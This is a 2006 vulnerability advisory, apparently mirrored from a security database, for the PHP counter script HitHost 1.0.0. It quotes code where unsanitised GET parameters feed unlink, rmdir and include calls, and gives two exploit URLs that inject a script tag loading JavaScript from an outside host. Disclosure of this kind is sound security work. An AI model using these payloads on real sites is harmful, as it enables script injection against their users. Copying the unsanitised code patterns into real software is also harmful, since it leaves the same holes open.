Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11722
HistoryMar 07, 2006 - 12:00 a.m.

histhost v1.0.0 xss and possible rmdir

2006-03-0700:00:00
vulners.com
10

——– summary
software: HitHost
vendors website: http://daverave.64digits.com/index.php?page=hithost
versions: <= 1.0.0
class: remote
status: unpatched
exploit: available
solution: not available
discovered by: retard
risk level: medium

——– description
hithost uses $_GET variables in crucial parts of their code causing
xss vulnerabilities and possibly allowing users to rm dirs chmoded
to 0777

    in ./admin/deleteuser.php:

15 else
16 {
17 unlink("users/$deleteuser/password.php");
18 unlink("users/$deleteuser/counter.php");
19 rmdir("users/$deleteuser/");
20 echo "The user <b>$deleteuser</b> has been deleted";
21 }

    as you see line 19 raises suspision of the possibility of rming 0777 dirs
    i&#39;ve tried it on on my personal server with no sucess, if someone knows
    of a way let me know.
    
    in ./admin/viewuser.php:

6 $viewuser = $_GET['user'];
7 include("users/$viewuser/counter.php");
8 echo "Username: <b>$viewuser</b><br><br>";
9 echo "Number of counter hits: $hits<br><br>";

    this code is self explanitory, the script does not sanitise the $_GET[&#39;user&#39;]
    allowing users to easily shove xss into the variable.

——– exploit(s)
http://example.com/admin/deleteuser.php?user=&lt;script&#37;20src=http://notlegal.ws/xss.js&gt;&lt;/script&gt;
http://example.com/admin/viewuser.php?hits=&lt;script&#37;20src=http://notlegal.ws/xss.js&gt;&lt;/script&gt;

——– credit
author(s): retard
email: [email protected]